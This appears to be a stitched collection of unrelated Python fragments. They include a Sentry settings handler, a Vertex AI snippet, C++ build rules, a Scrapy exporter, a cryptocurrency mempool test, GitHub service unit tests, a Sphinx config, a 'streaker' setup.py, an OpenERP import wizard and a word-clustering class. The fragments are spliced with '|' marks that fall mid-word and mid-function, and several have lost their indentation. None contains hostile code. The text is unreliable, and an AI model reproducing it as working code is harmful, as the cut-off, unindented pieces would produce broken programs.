                'default_environment':
                project.get_option('sentry:default_environment'),
                'mail_subject_prefix':
                project.get_option('mail:subject_prefix', options.get('mail.subject-prefix')),
            },
        )
def handle(self, request, organization, team, project):
form = self.get_form(request, project)
if form.is_valid():
project = form.save()
for opt in (
'origins', 'token', 'token_header', 'verify_ssl', 'resolve_age', 'scrub_data',
'scrub_defaults', 'sensitive_fields', 'safe_fields', 'scrub_ip_address',
'scrape_javascript', 'default_environment', 'mail_subject_prefix',
):
opt_key = 'sentry:{}'.format(opt)
# Value can't be overridden if set on the org level
if opt in form.org_overrides and organization.get_option(opt_key, False):
continue
if opt == 'mail_subject_prefix':
key = 'mail:subject_prefix'
else:
key = 'sentry:%s' % (opt, )
value = form.cleaned_data.get(opt)
if value is None:
project.delete_option(key)
else:
project.update_option(key, value)
self.create_audit_entry(
request,
o |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ReadTensorboardBlobData
# NOTE: This snippet has been automatically generated for illust | rative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-aiplatform
# [START aiplatform_v1_generated_TensorboardService_ReadTensorboardBlobData_sync]
from google.cloud import aiplatform_v1
def sample_read_tensorboard_blob_data():
    """Stream TensorBoard blob data for a time series and print each response."""
    # Create a client
    tensorboard_client = aiplatform_v1.TensorboardServiceClient()
    # Initialize request argument(s)
    blob_request = aiplatform_v1.ReadTensorboardBlobDataRequest(
        time_series="time_series_value",
    )
    # Make the request
    response_stream = tensorboard_client.read_tensorboard_blob_data(request=blob_request)
    # Handle the response
    for response in response_stream:
        print(response)
# [END aiplatform_v1_generated_TensorboardService_ReadTensorboardBlobData_sync]
|
ude=None, define=None, flags=None, headers=None,
compiler=None, warnings_are_errors=False, scan=True, msvc_lib=False,
debug=True, linkflags=None
):
if compiler is None:
compiler, toolchain = _get_default_compiler()
else:
toolchain = _get_toolchain(compiler)
if toolchain is None:
raise ValueError('toolchain could not be detected')
if headers is None:
headers = []
linkflags = list(linkflags) if linkflags else []
if flags is None:
flags = []
if toolchain is GNU:
flags.append('-fPIC')
if define is None:
define = {}
define['DLL_EXPORT'] = 1
objects = []
for source in sources:
obj = object(
sources=[source],
compiler=compiler,
scan=scan,
include=include,
define=define,
flags=flags,
error_warnings=warnings_are_errors,
debug=debug
)
objects.append(obj.output)
if toolchain is MSVC:
lib = name + '.lib'
if msvc_lib:
lib = core.build(lib)
else:
lib = core.intermediate(lib)
name = core.build(name + '.dll')
else:
lib = None
head, tail = os.path.split(name)
name = core.build(os.path.join(head, 'lib' + tail + '.so'))
yield core.publish(
inputs=objects,
message='Shared {}'.format(name),
outputs=[name, lib] if lib else [name],
result={
'type': 'cpp.shared_library',
'msvc_lib': core.absolute(lib),
'headers': core.absolute(core.resolve(headers)),
'output': core.absolute(name)
},
check=linkflags
)
if toolchain is GNU:
command = [compiler, '-shared', '-o', name]
command.extend(objects)
command.append('-Wl,-soname,' + os.path.basename(name))
command.extend(linkflags)
core.call(command)
elif toolchain is MSVC:
command = [compiler, '/Fe' + name, '/nologo', '/LD']
command.extend(objects)
command.extend(linkflags)
core.call(command, env=_msvc_get_cl_env(compiler))
base = os.path.splitext(name)[0]
if not msvc_lib:
origin = base + '.lib'
if os.path.isfile(lib):
os.remove(lib)
os.rename(origin, lib)
os.remove(base + '.exp')
else:
raise NotImplementedError
@core.rule
def object(
    name=None, sources=None, include=None, define=None, flags=None,
    compiler=None, error_warnings=False, scan=True, debug=True, depend=None
):
    """Build rule: compile C++ *sources* into a single object file.

    Supports the GNU and MSVC toolchains. Yields a ``core.publish`` record
    describing inputs/outputs, runs the compiler, then yields a
    ``core.deposit`` with the scanned header dependencies (when *scan* is
    enabled) and any compiler warnings.

    NOTE(review): the rule name shadows the ``object`` builtin; renaming
    would break existing build files, so it is kept.
    """
    if isinstance(sources, str):
        raise TypeError('sources must not be a string - try to use a list')
    if not sources:
        raise ValueError('sources must not be empty')
    sources = core.resolve(sources)
    # Defensive copies so caller-supplied containers are never mutated.
    include = list(include) if include else []
    define = dict(define) if define else {}
    flags = list(flags) if flags else []
    depend = list(depend) if depend else []
    if compiler is None:
        compiler, toolchain = _get_default_compiler()
    else:
        toolchain = _get_toolchain(compiler)
        if toolchain is None:
            raise ValueError('toolchain could not be detected')
    if name is None:
        # Derive a stable intermediate name from the sources and compiler.
        name = core.intermediate(core.checksum(
            core.absolute(sources), compiler)[:16])
    else:
        name = core.build(name)
    if toolchain is GNU:
        name += '.o'
    elif toolchain is MSVC:
        name += '.obj'
    yield core.publish(
        inputs=sources + [compiler] + depend,
        message='Compile ' + ', '.join(sources),
        outputs=[name],
        check=[include, define, flags, error_warnings, scan, debug],
        result={
            'type': 'cpp.object',
            'include': include,
            'define': define,
            'flags': flags,
            'compiler': compiler,
        }
    )
    # Normalize define values to preprocessor-friendly literals.
    for identifier, value in define.items():
        if isinstance(value, str):
            define[identifier] = '"{}"'.format(value)
        elif value is True:
            define[identifier] = 'true'
        elif value is False:
            define[identifier] = 'false'
        elif isinstance(value, (int, float)):
            pass
        else:
            raise TypeError('unsupported define type: {}'.format(type(value)))
    if toolchain is GNU:
        command = [compiler, '-c', '-o', name, '-x', 'c++', '-std=c++11']
        command.extend(sources)
        for directory in include:
            command.extend(['-I', directory])
        # Enable most warnings. Option to change this?
        command.append('-Wall')
        if error_warnings:
            command.append('-Werror')
        if debug:
            command.append('-g')
        else:
            command.append('-O3')
            command.append('-DNDEBUG')
        for identifier, value in define.items():
            command.append('-D{}={}'.format(identifier, value))
        if scan:
            # -MD/-MF writes the headers used into a make-style depfile.
            depfile = core.temporary(core.random('.d'))
            command.extend(['-MD', '-MF', depfile])
        else:
            depfile = None
        if _gnu_supports_colors(compiler):
            command.append('-fdiagnostics-color')
        command.extend(flags)
        output = core.call(command)
        if scan:
            # TODO: Good parsing.
            with open(depfile) as file:
                content = file.read()
            used = {
                os.path.abspath(x) for x in
                content[content.find(':')+1:].replace('\\\n', '\n').split()
            }
            # TODO: No difference!!
            used.difference_update(core.absolute(sources))
            used.difference_update(core.absolute(depend))
        else:
            used = None
        yield core.deposit(inputs=used, warnings=output or None)
    elif toolchain is MSVC:
        command = [compiler, '/c', '/Fo' + name, '/nologo']
        command.extend(sources)
        for directory in include:
            command.extend(['/I' + directory])
        if scan:
            # /showIncludes lists headers on stdout; parsed below.
            command.append('/showIncludes')
        for identifier, value in define.items():
            command.append('/D{}={}'.format(identifier, value))
        # TODO: Option to set c++ standard.
        # command.append('/std:' + standard)
        # TODO: Figure out debug / relase
        # === DEBUG ===
        # command.append('/ZI') Enable nice debug mode?
        # command.append('/Od') Disable optimizations for debug
        # command.append('/Gm') Enable minimal rebuild?
        # command.append('/RTC1') Run-time error checks
        # /MDd
        # === RELEASE ===
        # command.append('/Ox') Full Optimization or /Oi?
        # /Zi Debug information
        # /GL Breaks object-linking? Whole prog optimization
        # command.append('/O2') Optimize for speed
        command.append('/W4') # Enable most warnings.
        if error_warnings:
            command.append('/WX') # All warnings as errors.
        command.append('/EHsc') # Specify exception handling model
        command.append('/sdl') # Additional security warnings
        command.append('/TP') # Assume C++ sources
        command.extend(flags)
        try:
            output = core.call(command, env=_msvc_get_cl_env(compiler))
        except core.CallError as exc:
            # Strip the /showIncludes noise before re-raising so errors stay
            # readable.
            exc.output = _msvc_strip_includes(exc.output)
            raise
        if scan:
            used = _msvc_extract_includes(output)
        else:
            used = None
        yield core.deposit(
            inputs=used,
            warnings=_msvc_strip_includes(output).strip() or None
        )
def find_static_library(name):
    """Locate a static library, using the platform's naming convention."""
    pattern = '{}.lib' if core.windows else 'lib{}.a'
    return _find(pattern.format(name))
def find_shared_library(name):
    """Locate a shared library, using the platform's naming convention."""
    pattern = '{}.dll' if core.windows else 'lib{}.so'
    return _find(pattern.format(name))
def get_default_toolchain():
    """Return the toolchain constant (GNU or MSVC) of the default compiler."""
    _compiler, toolchain = _get_default_compiler()
    return toolchain
# Toolchain identifiers returned by get_default_toolchain() and compared
# with ``is`` throughout this module.
GNU = 'GNU'
MSVC = 'MSVC'
def _find(name):
if core.windows:
env = _msvc_get_cl_env(_get_default_comp |
from scrapy.contrib.exporter import CsvItemExporter
from scrapy.conf import settings
class SlybotCSVItemExporter(CsvItemExporter):
    """CSV exporter whose column list comes from the CSV_EXPORT_FIELDS setting."""

    def __init__(self, *args, **kwargs):
        # An unset/empty setting yields a falsy list; fall back to None so the
        # base exporter derives the columns from the exported items instead.
        export_fields = settings.getlist('CSV_EXPORT_FIELDS') or None
        kwargs['fields_to_export'] = export_fields
        super(SlybotCSVItemExporter, self).__init__(*args, **kwargs)
|
#!/usr/bin/en | v python2.7
import sys
for line in open(sys.argv[1]):
cut=line.split('\t')
if len | (cut)<11: continue
print ">"+cut[0]
print cut[9]
print "+"
print cut[10]
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Stardust Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test spending coinbase transactions.
# The coinbase transaction in block N can appear in block
# N+100... so is valid in the mempool when the best block
# height is N+99.
# This test makes sure coinbase spends that will be mature
# in the next block are accepted into the memory pool,
# but less mature coinbase spends are NOT.
#
from test_framework.test_framework import StardustTestFra | mework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class MempoolSpendCoinbaseTest(StardustTestFramework):
    """Check mempool acceptance rules for spends of coinbase outputs.

    A coinbase from block N is spendable at height N+100; a spend that
    matures in the very next block must be accepted into the mempool, while
    a less mature one must be rejected.
    """
    def __init__(self):
        super().__init__()
        self.num_nodes = 1
        self.setup_clean_chain = False
    def setup_network(self):
        # Just need one node for this test
        args = ["-checkmempool", "-debug=mempool"]
        self.nodes = []
        self.nodes.append(start_node(0, self.options.tmpdir, args))
        self.is_network_split = False
    def run_test(self):
        chain_height = self.nodes[0].getblockcount()
        assert_equal(chain_height, 200)
        node0_address = self.nodes[0].getnewaddress()
        # Coinbase at height chain_height-100+1 ok in mempool, should
        # get mined. Coinbase at height chain_height-100+2 is
        # too immature to spend.
        b = [ self.nodes[0].getblockhash(n) for n in range(101, 103) ]
        coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
        spends_raw = [ create_tx(self.nodes[0], txid, node0_address, 49.99) for txid in coinbase_txids ]
        spend_101_id = self.nodes[0].sendrawtransaction(spends_raw[0])
        # coinbase at height 102 should be too immature to spend
        assert_raises(JSONRPCException, self.nodes[0].sendrawtransaction, spends_raw[1])
        # mempool should have just spend_101:
        assert_equal(self.nodes[0].getrawmempool(), [ spend_101_id ])
        # mine a block, spend_101 should get confirmed
        self.nodes[0].generate(1)
        assert_equal(set(self.nodes[0].getrawmempool()), set())
        # ... and now height 102 can be spent:
        spend_102_id = self.nodes[0].sendrawtransaction(spends_raw[1])
        assert_equal(self.nodes[0].getrawmempool(), [ spend_102_id ])
# Allow running this functional test directly from the command line.
if __name__ == '__main__':
    MempoolSpendCoinbaseTest().main()
|
import unittest
from unittest.mock import patch
from app.main.service import GitHubUserService
@patch("app.main.service.github")
class TestGitHubUserService(unittest.TestCase):
    """Unit tests for GitHubUserService with the github client mocked.

    The class-level ``@patch`` injects the mocked ``github`` module as the
    extra ``github_client`` argument of every test method.
    """
    def setUp(self):
        # Canned client payload: one source ("non_fork") repo and one fork
        # whose parent belongs to a different user.
        self.test_user = "test"
        self.retrieved_repos_return = [
            {
                "fork": False,
                "name": "test_non_fork",
                "pull_url": "http://localhost/non_fork/pulls",
                "url": "https://localhost/non_fork",
                "full_name": self.test_user + "/test_non_fork",
                "html_url": "https://localhost"
            },
            {
                "fork": True,
                "name": "test_fork",
                "full_name": self.test_user + "/test_fork",
                "url": "https://localhost/child",
                "html_url": "https://localhost",
                "parent": {
                    "fork": False,
                    "name": "parent",
                    "url": "http://parent",
                    "full_name": self.test_user + "1/test_parent",
                    "pull_url": "https://localhost/parent/pulls",
                    "html_url": "https://localhost/parent"
                }
            }
        ]
    def test_search_for_users_error(self, github_client):
        """An error payload from the client is passed through as-is."""
        message = "too many"
        github_client.search_for_user.return_value = {"error": message}
        # NOTE(review): this calls search_for_user (singular) while the test
        # below calls search_for_users -- confirm both service entry points.
        assert GitHubUserService.search_for_user("nobody") == message
    def test_search_for_users_success(self, github_client):
        """Client user dicts are mapped onto user objects field by field."""
        github_client_return = [{
            "avatar_url": "test",
            "repos_url": "http://localhost",
            "html_url": "https://localhost",
            "login": "nobody"
        }]
        github_client.search_for_user.return_value = github_client_return
        found_users = GitHubUserService.search_for_users("nobody")
        self.assertEqual(found_users[0].avatar_url, github_client_return[0]["avatar_url"])
        self.assertEqual(found_users[0].repos_url, github_client_return[0]["repos_url"])
        self.assertEqual(found_users[0].url, github_client_return[0]["html_url"])
        self.assertEqual(found_users[0].login, github_client_return[0]["login"])
    def test_retrieve_repos_if_fork_with_pr(self, github_client):
        """Forked repos report the pull requests of their parent repo."""
        def local_mock_retrieve_pulls(url, state):
            pulls = [
                {
                    "html_url": "https://localhost/parent/pulls",
                    "title": "test title",
                    "user": {
                        "login": self.test_user
                    }
                }
            ]
            if "parent" in url:
                return pulls
            else:
                pulls[0]["html_url"] = self.retrieved_repos_return[0]["html_url"]
                return pulls
        # mocks
        github_client.retrieve_repos.return_value = self.retrieved_repos_return
        github_client.retrieve_repo.side_effect = self.mock_retrieve_repo
        github_client.retrieve_pulls.side_effect = local_mock_retrieve_pulls
        actual_repos = GitHubUserService.retrieve_repos(self.test_user)
        self.assertEqual(2, len(actual_repos))
        for repo in actual_repos:
            if repo.is_fork:
                self.assertTrue("parent" in
                                repo.pull_requests[0].url,
                                "The parent pulls are not in the repo: {}"
                                .format(repo.name))
    def test_retrieve_repos_if_fork_without_pr(self, github_client):
        """A fork whose parent has no pulls ends up with no pull requests."""
        def local_mock_retrieve_pulls(url, state):
            pulls = [
                {
                    "html_url": "https://localhost/parent/pulls",
                    "title": "test title",
                    "user": {
                        "login": self.test_user
                    }
                }
            ]
            if "parent" in url:
                return []
            else:
                pulls[0]["html_url"] = self.retrieved_repos_return[0]["html_url"]
                return pulls
        # mocks
        github_client.retrieve_repos.return_value = self.retrieved_repos_return
        github_client.retrieve_repo.side_effect = self.mock_retrieve_repo
        github_client.retrieve_pulls.side_effect = local_mock_retrieve_pulls
        actual_repos = GitHubUserService.retrieve_repos(self.test_user)
        for repo in actual_repos:
            if repo.is_fork:
                self.assertIsNone(repo.pull_requests,
                                  "The parent pulls are not in the repo: {}"
                                  .format(repo.name))
    def test_retrieve_repos_if_source_with_pr(self, github_client):
        """Source (non-fork) repos report their own pull requests."""
        def local_mock_retrieve_pulls(url, state):
            pulls = [
                {
                    "html_url": "https://localhost/non_fork/pulls",
                    "title": "test title",
                    "user": {
                        "login": self.test_user
                    }
                }
            ]
            return pulls
        # mocks
        github_client.retrieve_repos.return_value = self.retrieved_repos_return
        github_client.retrieve_repo.side_effect = self.mock_retrieve_repo
        github_client.retrieve_pulls.side_effect = local_mock_retrieve_pulls
        actual_repos = GitHubUserService.retrieve_repos(self.test_user)
        self.assertEqual(2, len(actual_repos))
        for repo in actual_repos:
            if not repo.is_fork:
                self.assertTrue("non_fork" in
                                repo.pull_requests[0].url,
                                "The non_fork pulls are not in the repo: {}"
                                .format(repo.name))
    def test_retrieve_repos_if_source_without_pr(self, github_client):
        """A source repo with no pulls ends up with no pull requests."""
        def local_mock_retrieve_pulls(url, state):
            return []
        # mocks
        github_client.retrieve_repos.return_value = self.retrieved_repos_return
        github_client.retrieve_repo.side_effect = self.mock_retrieve_repo
        github_client.retrieve_pulls.side_effect = local_mock_retrieve_pulls
        actual_repos = GitHubUserService.retrieve_repos(self.test_user)
        self.assertEqual(2, len(actual_repos))
        for repo in actual_repos:
            if not repo.is_fork:
                self.assertIsNone(repo.pull_requests,
                                  "The non_fork pulls are not in the repo: {}"
                                  .format(repo.name))
    # -----------------helper mock functions--------------------
    def mock_retrieve_repo(self, url):
        """Return the canned repo dict matching *url* (parent/fork/source)."""
        if "non_fork" in url:
            return self.retrieved_repos_return[0]
        elif "parent" in url:
            return self.retrieved_repos_return[1]["parent"]
        else:
            return self.retrieved_repos_return[1]
    def mock_retrieve_pulls(self, url, state):
        """Default pulls mock: parent URLs get parent pulls, others get the
        source repo's html_url substituted in."""
        pulls = [
            {
                "html_url": "https://localhost/parent/pulls",
                "title": "test title",
                "user": {
                    "login": self.test_user
                }
            }
        ]
        if "parent" in url:
            return pulls
        else:
            pulls[0]["html_url"] = self.retrieved_repos_return[0]["html_url"]
            return pulls
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
|
import _plot | ly_utils.basevalidators
class BgcolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
    # Auto-generated validator for the ``bgcolorsrc`` property of
    # ``histogram.marker.pattern``; as a ``SrcValidator`` it validates a
    # column-source reference rather than a literal value.
    def __init__(
        self, plotly_name="bgcolorsrc", parent_name="histogram.marker.pattern", **kwargs
    ):
        super(BgcolorsrcValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            # edit_type defaults to "none" unless the caller overrides it.
            edit_type=kwargs.pop("edit_type", "none"),
            **kwargs
        )
: utf-8 -*-
#
# sympa documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 25 18:11:49 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from datetime import date
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.doctest',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sympa'
# The copyright year is computed at build time from today's date, so it
# never goes stale.
copyright = u'%s, Direction Informatique' % date.today().strftime("%Y")
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'sympadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    ('index', 'sympa.tex', u'sympa Documentation',
     u'Direction Informatique', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'sympa', u'sympa Documentation',
     [u'Direction Informatique'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    ('index', 'sympa', u'sympa Documentation',
     u'Direction Informatique', 'sympa', 'One line description of project.',
     'Miscellaneous'),
]
# Documents to append |
from distutils.core import setup
# NOTE(review): distutils is deprecated (PEP 632) and removed in Python 3.12;
# also, install_requires is a setuptools keyword -- plain distutils ignores it.
# Switching the import to `from setuptools import setup` is a drop-in change;
# confirm before doing so.
setup(
    # Application name:
    name="streaker",
    # Version number (initial):
    version="0.0.1",
    # Application author details:
    author="Aldi Alimucaj",
    author_email="aldi.alimucaj@gmail.com",
    # Packages
    packages=["streaker"],
    scripts=['bin/streaker'],
    # Include additional files into the package
    include_package_data=True,
    # Details
    url="http://pypi.python.org/pypi/Streaker_v001/",
    #
    license="MIT",
    description="GitHub streak manipulator",
    # long_description=open("README.txt").read(),
    # Dependent packages (distributions)
    install_requires=[
        # "",
    ],
)
|
# -*- coding: utf-8 -*-
##############################################################################
#
# document_csv module for OpenERP, Import structure in CSV
# Copyright (C) 2011 SYLEAM (<http://www.syleam.fr/>)
# | Christophe CHAUVET <christophe.chauvet@syleam.fr>
# Copyright (C) 2011 Camptocamp (http://www.camptocamp.com)
# Guewen Baconnier
#
# This file is a part of document_csv
#
# document_csv is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# document_csv | is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import osv
from osv import fields
class LaunchImport(osv.osv_memory):
    """Transient wizard to pick an import structure, upload a CSV file and
    launch the import through ``ir.attachment.import_csv``."""
    _name = 'wizard.launch.import.csv'
    _description = 'Interface to launch CSV import'
    _rec_name = 'import_list'

    def _import_list(self, cr, uid, context=None):
        # Selection provider for the 'import_list' field: only structures
        # that are not disabled are offered.  Keys are database ids (ints),
        # which is why launch_import() converts the selected value back
        # with int().
        implist_obj = self.pool.get('document.import.list')
        doc_ids = implist_obj.search(cr, uid, [('disable', '=', False)])
        if doc_ids:
            return [(x.id, x.name) for x in implist_obj.browse(cr, uid, doc_ids, context=context)]
        return []

    _columns = {
        'import_list': fields.selection(_import_list, 'List', help='List of available import structure', required=True),
        'import_file': fields.binary('Filename', required=True),
        'lang_id': fields.many2one('res.lang', 'Language', help='Translation to update.'),
        'email_result': fields.char('Email', size=256, help='Email to send notification when import is finished'),
    }

    def default_get(self, cr, uid, fields_list, context=None):
        """
        Retrieve email for this user
        """
        if context is None:
            context = {}
        res = super(LaunchImport, self).default_get(cr, uid, fields_list, context=context)
        # Pre-fill the notification address with the current user's email.
        user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
        res['email_result'] = user.user_email or ''
        # Default the translation language to the user's context language.
        if context.get('lang'):
            res['lang_id'] = self.pool.get('res.lang').search(cr, uid, [('code', '=', context['lang'])], context=context)
        return res

    def launch_import(self, cr, uid, ids, context=None):
        """
        Save file, and execute importation
        """
        if context is None:
            context = {}
        cur = self.browse(cr, uid, ids[0], context=context)
        ctx = context.copy()
        # Run the import under the chosen language so translated fields
        # are updated in that translation.
        if cur.lang_id:
            ctx.update({'lang': cur.lang_id.code})
        self.pool.get('ir.attachment').import_csv(cr, uid, int(cur.import_list), cur.import_file, cur.email_result, context=ctx)
        return {'type': 'ir.actions.act_window_close'}

LaunchImport()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
from sklearn.cluster import MiniBatchKMeans
import numpy as np
import json
import os
from texta.settings import MODELS_DIR
class WordCluster(object):
    """
    WordCluster object to cluster Word2Vec vectors using MiniBatchKMeans.

    Each vocabulary word is assigned to a cluster; every cluster is labelled
    with an "etalon" word -- the vocabulary word closest to the cluster
    centroid -- and both directions of the mapping are kept:

    - ``word_to_cluster_dict``: word -> etalon of its cluster
    - ``cluster_dict``: etalon -> list of member words

    : param embedding : Word2Vec object
    : param n_clusters, int, number of clusters in output
    """

    def __init__(self):
        # word -> etalon (its cluster's label word)
        self.word_to_cluster_dict = {}
        # etalon -> list of words belonging to that cluster
        self.cluster_dict = {}

    def cluster(self, embedding, n_clusters=None):
        """Cluster the embedding vocabulary and build both lookup dicts.

        :param embedding: trained Word2Vec model (needs .wv and most_similar)
        :param n_clusters: number of clusters; if falsy, defaults to 10% of
            the vocabulary size, capped at 1000
        :return: True
        """
        vocab = list(embedding.wv.vocab.keys())
        vocab_vectors = np.array([embedding[word] for word in vocab])
        if not n_clusters:
            # number of clusters = 10% of embedding vocabulary
            # if larger than 1000, limit to 1000
            n_clusters = int(len(vocab) * 0.1)
            if n_clusters > 1000:
                n_clusters = 1000
        clustering = MiniBatchKMeans(n_clusters=n_clusters).fit(vocab_vectors)
        cluster_labels = clustering.labels_
        for i, cluster_label in enumerate(cluster_labels):
            word = vocab[i]
            # Label the cluster with the vocabulary word nearest its centroid.
            etalon = embedding.wv.most_similar(positive=[clustering.cluster_centers_[cluster_label]])[0][0]
            if etalon not in self.cluster_dict:
                self.cluster_dict[etalon] = []
            self.cluster_dict[etalon].append(word)
            self.word_to_cluster_dict[word] = etalon
        return True

    def query(self, word):
        """Return all words in the same cluster as `word`, or [] if unknown."""
        try:
            return self.cluster_dict[self.word_to_cluster_dict[word]]
        except KeyError:
            # Was a bare `except:`; only a missing key is expected here.
            return []

    def text_to_clusters(self, text):
        """Map a token list to a space-joined string of cluster labels,
        silently dropping tokens not present in any cluster."""
        text = [str(self.word_to_cluster_dict[word]) for word in text if word in self.word_to_cluster_dict]
        return ' '.join(text)

    def save(self, file_path):
        """Serialise both mappings to `file_path` as JSON.

        :return: True on success, False on failure
        """
        try:
            data = {"word_to_cluster_dict": self.word_to_cluster_dict, "cluster_dict": self.cluster_dict}
            with open(file_path, 'w') as fh:
                fh.write(json.dumps(data))
            return True
        except (OSError, IOError, TypeError, ValueError):
            # Was a bare `except:`; catch only I/O and serialisation errors.
            return False

    def load(self, unique_id, task_type='train_tagger'):
        """Load mappings previously written by save() from MODELS_DIR.

        :return: True on success, False on failure.  BUG FIX: the success
            path previously fell through and returned None (falsy), so
            callers could not distinguish success from failure.
        """
        file_path = os.path.join(MODELS_DIR, task_type, 'cluster_{}'.format(unique_id))
        try:
            with open(file_path) as fh:
                data = json.loads(fh.read())
            self.cluster_dict = data["cluster_dict"]
            self.word_to_cluster_dict = data["word_to_cluster_dict"]
            return True
        except (OSError, IOError, KeyError, ValueError):
